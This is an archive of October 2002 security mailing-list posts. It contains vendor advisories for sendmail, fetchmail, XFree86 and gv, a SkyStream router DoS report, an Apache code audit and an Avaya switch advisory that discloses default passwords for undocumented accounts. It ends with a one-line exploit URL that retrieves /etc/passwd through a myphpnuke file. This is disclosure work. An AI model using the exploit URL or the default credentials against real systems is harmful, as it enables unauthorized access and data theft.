Re: J2EE EJB privacy leak and DOS.

2002-10-16 Thread Ari Gordon-Schlosberg

[Alan Rouse <[EMAIL PROTECTED]>]
> Without more details, it sounds to me as if an attacker would first have
> to deploy her own code in the EJB server, before she could attack the
> target user's objects.  If the attacker has that capability, can't she
> accomplish the same end with or without this vulnerability?
> 
> Or is there a way to exploit this without the attacker having power to
> deploy her own code?
> 

The whole point of EJB application servers is to have pluggable
applications that can be bought and deployed.  This hole would allow my
code from, say, an email component to grab objects used by the credit-card
processing module.

-- 
Ari Gordon-Schlosberg http://www.nebcorp.com/~regs/pgp for PGP public key




Openwall GNU/*/Linux (Owl) 1.0 release

2002-10-16 Thread Solar Designer

Hi,

For those who don't know yet, Openwall GNU/*/Linux (or Owl) is a
security-enhanced operating system with Linux and GNU software as its
core, intended as a server platform.  And, of course, it's free.  More
detailed information is available on the web site:

http://www.openwall.com/Owl/

After over a year of development and many public Owl-current
snapshots, we're pleased to announce that Owl 1.0 is finally out.

The major changes made since 0.1-prerelease are documented:

http://www.openwall.com/Owl/CHANGES-1.0.shtml

The release may be freely downloaded from our FTP mirrors or ordered
on a CD.  Of course, we prefer the latter, but it's your choice.
Similarly, you may choose to pay just what it costs to get the CD to
you, or you may also support our project.

CDs (and ISO-9660 images available via the FTP mirrors) are bootable
on x86 and include a live system and x86 binary packages, as well as
full source code which may be rebuilt with one simple command ("make
buildworld").  Security tools such as John the Ripper are usable right
off the CD, without requiring a hard disk -- this way Owl may also be
considered an alternative to Trinux.

Currently available via the FTP mirrors only are the Owl 1.0 binary
packages for SPARC and Alpha architectures.

PGP-signed mtree(8) specifications for all of the above are available
via FTP and in the root directory of Owl CDs (such that you don't even
have to blindly trust CDs arriving via mail).

The 0.1-stable branch is now officially unsupported, in favor of the
1.0 release and its corresponding stable branch.  The change logs for
0.1-stable (which include security fix information) are no longer on
the web site, however 0.1-stable is still available on the FTP mirrors
(for reference only) and will of course remain available via anoncvs.

Owl 1.0-stable already exists in the CVS (in fact, it's been started
prior to the 1.0 release this time) and will also be made available
via FTP once the need arises (that is, a critical post-release fix is
applied).

Development will continue primarily in Owl-current, although we might
make another release based on 1.0-stable as well.

-- 
/sd



[GIS 2002021001] SkyStream EMR5000 DVB router DoS.

2002-10-16 Thread Global InterSec Research

Global InterSec LLC
http://www.globalintersec.com

GIS Advisory ID:2002021001
Changed:10/16/2002
Author: [EMAIL PROTECTED]
Reference:  http://www.globalintersec.com/adv/skystream-2002021001.txt

Summary:

   SkyStream's Edge Media Router-5000 (EMR5000) a DVB to
   multicast router suffers from a vulnerability in its modified Linux
   kernel.

Impact:

   A remote user may cause a denial of service attack against
   the device, causing it to crash (kernel panic).

Versions Tested:

   1.16
   1.17
   1.18

Description:

   The Linux based kernel, which the EMR5000 uses, has been modified
   to work with SkyStream's customized PCB. Modifications include
   proprietary DVB card drivers.

   A problem exists within the kernel code  which could cause a
   kernel panic, when the device is no longer able to process data
   being pushed into the ethernet ring buffers.

   Rather than dropping packets, or even temporarily disabling the
   interrupt address for the ethernet device, a null pointer exception
   will occur in the interrupt handler, leading to a kernel panic.

   Although the EMR5000 uses Intel's 82559ER ethernet controller, which
   is supported by the eepro100 driver (included in the 2.4.x tree),
   this condition could not be replicated on other systems, also with
   the 82559ER onboard and using the eepro100 drivers. This is almost
   certainly down to how SkyStream have implemented DMA, in order to
   work with their PCB configuration and is therefore a problem which
   is inherent to the EMR5000 and not necessarily other systems using
   the eepro100 kernel modules.


Scope for attack:

   Because this bug is directly connected to the EMR5000's network
   interface, the above bug may be exploited remotely. It may also
   be triggered fairly anonymously, with the use of spoofed SYN
   packets for example.

   In our early tests, the EMR5000 did not reboot on a kernel panic
   and required a manual (cold) reboot. The most recent boot version
   did handle the condition and reboot cleanly.


Work around:

   Firewall all inbound traffic to the EMR5000, other than IGMP(2).
   This is not a bullet proof work-around as the bug may also be
   exploited through the use of IGMP.

Credit:

   The vulnerabilities disclosed in this advisory were discovered
   during routine penetration tests. They were further researched
   at Global InterSec's facility.

   The research division can be reached at [EMAIL PROTECTED]

Vendor Status:

   Ellie Abdollahi ("Director of Software") of SkyStream INC was
   notified of this problem on July 26, 2002. SkyStream has denied
   responsibility for this problem, given their use of the Intel
   ethernet controller and the eepro100 kernel module.

   Subsequently, no fix has been provided. SkyStream was given GIS's
   statutory 60 day advanced warning of this problem, along with a
   copy of this advisory before its publication.


Proof of concept/Exploit:

   The following was the result of high volumes of IGMPv2 requests being
   sent to the ethernet interface.

   SkyStream Networks
   Edge Media Router
   Please login as 'emradmin' for Command-Line Interface
   emr5000 login: Oops: Exception in kernel mode, sig: 4
   NIP: C00FB4F4 XER:  LR: C00FB4F4 SP: C01D79A0 REGS: c01d78f0 
TRAP: 0700
   MSR: 9230 EE: 1 PR: 0 FP: 0 ME: 1 IR/DR: 
11
   TASK = c01d6030[0] 'swapper' Last syscall: 120
   last math  last altivec 
   GPR00: C00FB4F4 C01D79A0 C01D6030 001C 1230 0001 C022 

   GPR08: C022 C01E 1236 C01D78E0 24004024 10068BC4 000C0A04 

   GPR16:  FFFE2198  2FB6 1230 001D7A80  
C01D82C8
   GPR24: 01C0 C022 C01ECF00 0007 C01D82C8 C01E  
C45976E0
   Call 
backtrace:
   C00FB4F4 C00FEBE0 C00C4318 C0003BA0 C0003CCC C0002A38 C00FB40C
   C00FB65C C00FEBE0 C00C3FE4 C0003BA0 C0003CCC C0002A38 2000
   C0003CCC C0002A38 C010C214 C00FF13C C001885C C0002A84 C002354C
   C0004294 C00042BC C01ED8A0 C00023C4
   Kernel panic: Aiee, killing interrupt handler!
   In interrupt handler - not syncing
   Rebooting in 180 seconds..


Legal:

   This advisory is the intellectual property of Global InterSec LLC
   but may be freely distributed with the conditions that:

a) No fee is charged.
b) Appropriate credit is given.
c) Distribution of the advisory does not break NDA' s issued by GIS.

(c) Global InterSec LLC 2002



[CLA-2002:532] Conectiva Linux Security Announcement - sendmail

2002-10-16 Thread secure

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : sendmail
SUMMARY   : Local vulnerability
DATE  : 2002-10-16 15:49:00
ID: CLA-2002:532
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
 Sendmail is a widely used Mail Transfer Agent (MTA). "smrsh" is an
 application intended as a replacement for the sh shell for use with
 Sendmail. It imposes some restrictions to what programs can be
 executed when parsing ~/.forward and system wide mail aliases.
 
 Zen-parse and Pedram Amini found two ways[1] to exploit smrsh in
 order to make it execute any program on the system. The first one is
 by inserting specially formatted commands in the .forward file
 located in the user's home directory. The second one is by directly
 calling smrsh with special parameters.
 
 By exploiting this vulnerability, users who have no shell account or
 are not allowed to execute some programs can use smrsh to bypass such
 restrictions.
 
 The Common Vulnerabilities and Exposures project (cve.mitre.org) has
 assigned the name CAN-2002-1165 to this issue[2].


SOLUTION
 All sendmail users should upgrade.
 
 
 REFERENCES:
 1.http://www.sendmail.org/smrsh.adv.txt
 2.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1165


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_1cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9racN42jd0JmAcZARAktnAKDferWuXLqHuCmNNVcO4OOrBB3VoQCcDr8t
Al+K1yh074tp3SIMO0rl1xM=
=OS1v
-END PGP SIGNATURE-




Re: Undocumented account vulnerability in Avaya P550R/P580/P880/P882switches

2002-10-16 Thread Mike Scher

In response to tbe below, we examined this issue on a Cajun P550 (not
550R) with software version 4.3.5.

We found:

1) The accounts (manuf and diag) are clearly present in the config and
easily seen with 'show running-conf' or 'show startup-conf'
2) They are system accounts and cannot be deleted
3) They have by default the passwords indicated by Mr. Lipkowski
4) They CAN have their passwords changed by the 'root user' and the
changes save sucessfully across reloads.

We'd ask that others verify (for other software/hardware combinations)
whether they can change the account passwords ( 'username manuf password
foo' ), and save them ( 'copy running-config startup-config' ), reload,
and check whether the passwords changes have saved.

As an aside:

While testing, we noticed that accounts with the same password show the
same saved hash, indicating that only one salt is in use.  That may be a
legacy item on the P550, which is discontinued and stuck at 4.3.5 version
software.

We'd ask others to check whether this (minor, but nevertheless real) issue
is present in newer revisions as well.

  -Mike

-- 
Michael Scher | Director, Neohapsis Labs
[EMAIL PROTECTED]  | General Counsel

On Tue, 15 Oct 2002, Jacek Lipkowski wrote:

> Undocumented account vulnerability in Avaya P550R/P580/P880/P882 switches
>
> 1. Problem Description
>
> Two undocummented accounts with default passwords allow access via telnet
> and the web interface to Cajun P550R/P580/P880/P882 switches. Both
> accounts give developer access to the switch. The vulnerability can be
> avioded by upgrading to software version 5.3.0 or later and disabling the
> accounts.
>
> 2. Tested systems
>
> The following versions were tested and found vulnerable:
>
> Avaya Cajun P580 software version 5.2.14
>
> All previous software versions are assumed to be vulnerable. This
> problem is present in P550R,P580,P880 and P882.
>
> 3. Details
>
> The vulnerable firmware installs the following strings into the switch
> configuration by default:
>
> username "root" password encrypted-type1 "$tSfIcnbTP.pxRf7BrhGW31"
> access-type admin
> username "diag" password encrypted-type1 "$PQO.vGxkvDHkEDCJ2YsoD1"
> access-type read-write
> username "manuf" password encrypted-type1 "$seHFLP9b16m2v/534WCk90"
> access-type read-write
>
> The only documented password is for the root user. This user can't
> change the diag and manuf accounts.
>
> The un-documented passwords are:
>
> user  password
>   
> diag  danger
> manuf xxyyzz
>
> Both of these accounts give developer access to the switch (read-write
> access-type), which is more priviliged than normal administrative access
> (admin access-type).
>
> 4. Recommendations
>
> As always it is good administrative practice to block access to
> administrative interfaces (telnet, web) at the firewall. Upgrading to
> software version 5.3.0 or later and disabling the accounts resolves ths
> issue.
>
> As a temporary workaround download the configuration file via tftp, edit
> out these accounts, or change their password hashes, and upload it to the
> switch.
>
>
> 5. Vendor status
>
> AVAYA was informed on 2 Oct 2002. The vendor responded the same day, proved
> responsive and worked promptly on the problem. I have agreed to release the
> information after the release of the official AVAYA advisory. The official
> Avaya advisory was out on 11 Oct 2002. The fixed software is avaliable from the
> Avaya support site http://support.avaya.com.
>
> Official AVAYA security advisories are located at
> http://support.avaya.com/security/
>
> 6. Disclaimer
>
> Neither I nor my employer is responsible for the use or misuse of
> information in this advisory.  The opinions expressed are my own and not
> of any company.  Any use of the information is at the user's own risk.
>
>
> Jacek Lipkowski [EMAIL PROTECTED]
>
> Andra Co. Ltd.
> ul Wynalazek 6
> 02-677 Warsaw, Poland
> http://www.andra.com.pl
>
>
>





MSN Moster Strike Back ?!

2002-10-16 Thread drorshalev

In-Reply-To: <[EMAIL PROTECTED]>

IS MSN  Moster Strike Back ?!

Less then 10 hours   After i Post This message on BugTraq
Hotmail  Cancelled My Hotmail Account (my Primary email account).

So Now I am a "Man Without Email Account".

you can check out the Error MSG on my Security Workshop :

http://sec.drorshalev.com/dev/hotmail/AccessDenied.JPG


IS Redmond Monster Strike Back a Security Expert that find Bugs on there 
Software ?

i think i rether should get Thanks for my Free QA.

my MSN Passport is Still active ( hope it stay like this)

i can be found @ [EMAIL PROTECTED] or [EMAIL PROTECTED]

dror shalev 
AKA -Man without Email acount


IE & MSN expose contact list & other info 
--
by spoofing IE security zone using Die Yu Liu % encoding bug (IE 6)
this can lead to Privacy Risk
MSN Status & hotmail Email Notification exposed by
other IE versions

MSN Contact demo

http://sec.drorshalev.com/dev/friends/
MSN Contact demo

More demos are on http://sec.drorshalev.com 

Feel Free to contact me!
See my Security WorkShop
Dror Shalev

[EMAIL PROTECTED]
Are You Safe?

http://www.SafeCenter.NET



Apache 1.3.26

2002-10-16 Thread David Wagner

I recently did a very brief (and non-exhaustive) security audit of
Apache 1.3.26, and noticed some small potential bugs in some of the
helper programs that come with the distribution.

Apache maintainers have been notified, and the most serious of these
bugs have been fixed in 1.3.27.  I'm sending this primarily to document
for the record what vulnerabilities existed and were fixed.  This audit
can be found on Sardonix at https://sardonix.org/audit/apache-45.html

Also, I noticed a few suspicious code fragments, which weren't fixed
in 1.3.27.  For the most part, their security consequences looked
less dire, or minimal.  I'll describe these as well for completeness.
Can anyone else take a look at these and see if I overlooked anything?


1. Buffer overrun in support/ab.c:read_connection()
  char buffer[8192];
  char servername[1024];
  static void read_connection(struct connection * c) {
  ...
  r = ab_read(c->fd, buffer, sizeof(buffer));
  ...
char *p, *q;
p = strstr(c->cbuff, "Server:");
q = servername;
if (p) {
p += 8;
while (*p > 32)
*q++ = *p++;
}
*q = 0;
Impact: Anyone using ab to connect to a malicious server may be vulnerable
Fixed in 1.3.27: http://www.apacheweek.com/features/security-13

2. Race condition in support/htpasswd.c:main()
  tempfilename = tmpnam(tname_buf);
  ftemp = fopen(tempfilename, "w+");
  ...
  copy_file(ftemp, fpw);
Impact: any local user can read, modify contents of Apache password file,
if she exploits this bug when an administrator runs htpasswd
Not fixed in 1.3.27

3. Race condition in support/htdigest.c:main()
  tn = tmpnam(NULL);
  if (!(tfp = fopen(tn, "w"))) ...
  ...
  sprintf(command, "cp %s %s", tn, argv[1]);
  system(command);
Impact: any local user can read, modify contents of Apache password file,
if she exploits this bug when an administrator runs htdigest
Not fixed in 1.3.27

4. Also, totally bogus call to system() in support/htdigest.c:main()
  (see above)
Impact: probably none, but htdigest shouldn't be called from CGI scripts, etc.
Not fixed in 1.3.27

5. Buffer overruns in support/htdigest.c:main()
There are many, but here's one:
  #define MAX_STRING_LEN 256
  int main(int argc, char *argv[]) {
  char user[MAX_STRING_LEN];
  strcpy(user, argv[3]);
Impact: probably none, but htdigest shouldn't be called from CGI scripts, etc.
Not fixed in 1.3.27

6. strncat() used incorrectly in support/ab.c:main()
  char cookie[1024];
  int main(int argc, char **argv) {
while ((c = getopt(argc, argv, "..."))) {
switch (c) {
case 'C':
  strncat(cookie, "Cookie: ", sizeof(cookie));
  strncat(cookie, optarg, sizeof(cookie));
  strncat(cookie, "\r\n", sizeof(cookie));
  break;
Also, -A, -P, and -H are broken as well.
Impact: probably none, but ab shouldn't be called from CGI scripts, etc.
Fixed in 1.3.27: http://www.apacheweek.com/features/security-13


Acknowledgements: This audit was aided by RATS.  Thanks to the RATS authors!



[CLA-2002:531] Conectiva Linux Security Announcement - fetchmail

2002-10-16 Thread secure

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : fetchmail
SUMMARY   : Multidrop mode vulnerabilities
DATE  : 2002-10-16 13:05:00
ID: CLA-2002:531
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
 Fetchmail is a popular mail retrieval and forwarding utility.
 
 Stefan Esser discovered[1] two vulnerabilities in fetchmail functions
 responsible for parsing message headers. These vulnerabilities are
 present in unpatched versions of fetchmail prior to 6.1.0 and can be
 exploited only if it is running in "multidrop" mode.
 
 The first one is a broken boundary check, which can be exploited by a
 remote attacker who is able to send a specially crafted DNS packet to
 the victim. This attack can crash fetchmail, thus causing a Denial of
 Service (DoS).
 
 The second one is a buffer overflow. A remote attacker can exploit it
 by sending a message with a specially crafted 'Received:' header
 inside it. By exploiting this the attacker can execute arbitrary code
 with the privileges of the user running fetchmail.


SOLUTION
 All fetchmail users should upgrade.
 
 IMPORTANT: if fetchmail is running as a daemon, it will have to be
 restarted in order to run the new version.
 
 
 REFERENCES:
 1.http://security.e-matters.de/advisories/032002.html


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-5.9.12-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmailconf-5.9.12-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-doc-5.9.12-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/fetchmail-5.9.12-1U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-5.9.12-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmailconf-5.9.12-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-doc-5.9.12-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fetchmail-5.9.12-1U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-5.9.12-1U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmailconf-5.9.12-1U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-doc-5.9.12-1U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/fetchmail-5.9.12-1U80_2cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9rYBU42jd0JmAcZARAgfrAJ92iPXP2azx+np0zZNKjGgMnOy1XwCfTmy2
UW3BcaWlPVdObb1Wsyswg/Y=
=pyoh
-END PGP SIGNATURE-




[CLA-2002:533] Conectiva Linux Security Announcement - XFree86

2002-10-16 Thread secure

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : XFree86
SUMMARY   : Several vulnerabilities
DATE  : 2002-10-16 19:55:00
ID: CLA-2002:533
RELEVANT
RELEASES  : 6.0, 7.0

- -

DESCRIPTION
 XFree86 is a freely redistributable open-source implementation of the
 X Window System, which is a client/server interface between display
 hardware and the desktop environment.
 
 This advisory addresses several vulnerabilities[1] in XFree86-4.0.1
 in Conectiva Linux 6.0 and XFree86-4.0.3 in Conectiva Linux 7.0.
 Conectiva Linux 8 was previously updated[2] and already contains
 these fixes.
 
 It also fixes several vulnerabilities present in XFree86 version
 3.3.6a, which was distributed for compatibility reasons with
 Conectiva Linux 6.0 and 7.0.
 
 
 - MIT-SHM extension vulnerability
 
 Roberto Zunino discovered a vulnerability in the MIT-SHM extension of
 XFree86 prior to versions 4.2.1. The vulnerability allows a local
 user who can run XFree86 to gain read/write access to any shared
 memory segment in the system. Although the use of shared memory
 segments to store trusted data is not a comom practice, by exploiting
 this vulnerability the attacker potentially can get and/or change
 sensitive information.
 
 
 - Buffer overflow in glyph clipping for large origin.
 
 A buffer overflow vulnerability[3] was found in the glyph code when
 clipping large origins. A remote attacker could exploit this
 vulnerability to cause a denial of service and possibly run arbitrary
 code by, for example, using a large number of characters through web
 page search forms of some web browsers.
 
 The Common Vulnerabilities and Exposures project (cve.mitre.org) has
 assigned the name CAN-2001-0955 to this issue[4].
 
 
 Additional fixes from the XFree86 CVS tree are listed below and have
 also been applied to this update.
 
 
 - Check for negative reply length/overflow in _XAsyncReply().
 
 Mike A. Harris sent[5] a patch to the XFree86 3.3 source tree to fix
 an overflow vulnerability. The vulnerability is also present in
 XFree86 4.x versions, and the patch was adapted to fix it.
 
 
 - XDM restrictions bypassed by non existent directory
 
 If the xdm auth directory did not exist, any user could connect to
 the Xserver using xdm. This was reported by Galen Hancock and the fix
 was made[6] by setting the authComplain variable to true as default.
 This is the expected behavior and is specified in the manual page of
 the xdm configuration.
 
 
 - Authentication issues with mmap() on drm devices
 
 Jeff Hartmann sent a fix[7] for a vulnerability in the way the mmap()
 system call was being used on DRM devices.
 
 
 - Kernel security hole in Linux int10 module
 
 Marc La France commited[8] to the XFree86 CVS tree a fix for a
 vulnerability in the linux int10 module.
 
 
 XFree86 3.3.6 compatiblity packages are being upgraded with the
 latest branch patches available. The changelog[9] entries from the
 XFree86 source related to security fixes since our last update are
 below:
 
 - Avoid DoS attacks on xdm (Keith Packard).
 - Check for negative reply length/overflow in _XAsyncReply (Xlib)
   (#4601, Mike Harris).
 - Fix possible buffer overflow (NOT on stack) in xdm xdmcp code
   (patch69 from Red Hat SRPMS).
 - Pull in fixes from 4.0.2 for the following problems:
   . XlibInt buffer overflow
   . libICE denial of service
   . XOpenDisplay buffer overflow (#4450, Branden Robinson)
 - Fix temp file problem in Imake.rules, InstallManPageAliases
   (Matthieu Herrb)
 - Pull in fixes from the main branch:
   . xfs DoS (Paulo Cesar Pereira de Andrade and Keith Packard),
   . _XAsyncReply() Xlib stack corruption,
   . Xaw temp file handling (Branden Robinson).
 - Safe tempfile handling for imake's probing of glibc version (based
   on #4257, Colin Phipps).
 - Fix a 1-byte overflow in Xtrans.c (#4182, Aaron Campbell).
 - Back port fix for http://www.securityfocus.com/archive/1/139436
   from 4.0 (#4181, Matthieu Herrb).


SOLUTION
 All XFree86 users are advised to upgrade.
 
 
 REFERENCES:
 1.http://www.xfree86.org/security/
 2.http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000529&idioma=en
 3.http://marc.theaimsgroup.com/?l=vuln-dev&m=100118958310463&w=2
 4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0955
 5.http://www.xfree86.org/devel/archives/patch/2001-Apr/0069.shtml
 6.http://www.xfree86.org/pipermail/cvs-commit/2001-October/003140.html
 7.http://www.xfree86.org/pipermail/cvs-commit/2001-May/002350.html
 8.http://www.xfree86.org/pipermail/cvs-commit/2001-March/001633.html
 
9.http://cvsweb.xfree86.org/cvsweb/~checkout~/xc/programs/Xserver/hw/xfree86/CHANGELOG?rev=3.390.2.341


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.c

[SECURITY] [DSA 176-1] New gv packages fix buffer overflow

2002-10-16 Thread Martin Schulze

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 176-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 16th, 2002  http://www.debian.org/security/faq
- --

Package: gv
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2002-0838
BugTraq ID : 5808

Zen-parse discovered a buffer overflow in gv, a PostScript and PDF
viewer for X11.  This problem is triggered by scanning the PostScript
file and can be exploited by an attacker sending a malformed
PostScript or PDF file.  The attacker is able to cause arbitrary code
to be run with the privileges of the victim.

This problem has been fixed in version 3.5.8-26.1 for the current
stable distribution (woody), in version 3.5.8-17.1 for the old stable
distribution (potato) and version 3.5.8-27 for the unstable
distribution (sid).

We recommend that you upgrade your gv package.

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 2.2 alias potato
- -

  Source archives:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.dsc
  Size/MD5 checksum:  555 3aa3cb663f578cbf02c09f370951a814
http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.diff.gz
  Size/MD5 checksum:29382 2e9e7149b69bf36a80632c8b695b6495
http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz
  Size/MD5 checksum:   369609 8f2f0bd97395d6cea52926ddee736da8

  Alpha architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_alpha.deb
  Size/MD5 checksum:   278646 b12dd5fef60ff840b3921a511eb28c74

  ARM architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_arm.deb
  Size/MD5 checksum:   238918 52892bea304128845836b4c9976d39a3

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_i386.deb
  Size/MD5 checksum:   226416 4f44d7df45cec7b132c1c7c9a6ba84ea

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_m68k.deb
  Size/MD5 checksum:   217712 2decb437f1a28beac92edb63f3d31444

  PowerPC architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_powerpc.deb
  Size/MD5 checksum:   244382 cb3bd27b214e391ada83ce0593e16715

  Sun Sparc architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_sparc.deb
  Size/MD5 checksum:   237878 ba1bdf19f68f62d36c8f58c015867287


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.dsc
  Size/MD5 checksum:  559 e7a2b5dfb91d7217d1b171b24682ea41
http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.diff.gz
  Size/MD5 checksum:18453 f9910a58912e1a6fbaef33ff4fe27b94
http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz
  Size/MD5 checksum:   369609 8f2f0bd97395d6cea52926ddee736da8

  Alpha architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_alpha.deb
  Size/MD5 checksum:   273262 6cb8adebf56cc25ef43d1358636dc9ca

  ARM architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_arm.deb
  Size/MD5 checksum:   243382 2707a8a87e133a45cc2a98dd223e7c8f

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_i386.deb
  Size/MD5 checksum:   226106 304f32b84e649761a26c9dc5c1fd

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_ia64.deb
  Size/MD5 checksum:   313888 522c58c4d2fecb99424533c4980d1409

  HP Precision architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_hppa.deb
  Size/MD5 checksum:   252054 aa50a00ebb6d5c304ec94bbf1e65a2c9

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_m68k.deb
  Size/MD5 checksum:   216922 d11c3c10e70fb1593ce15c2b6c3863be

  Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mips.deb
  Size/MD5 checksum:   252064 6b944b4c04f4488ea380063bdf3324ad

  Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mipsel.deb
  Size/MD5 checksum:   250914 87afe

phptonuke allows Remote File Retrieving

2002-10-16 Thread Zero-X ScriptKiddy

The file "phptonuke.php" from myphpnuke allows Remote File Retrieving.

Exploit Example:
http://website.com/phptonuke.php?filnavn=/etc/passwd


Zero X, member of www.Lobnan.de
-- 
Get your free email from www.linuxmail.org 


Powered by Outblaze



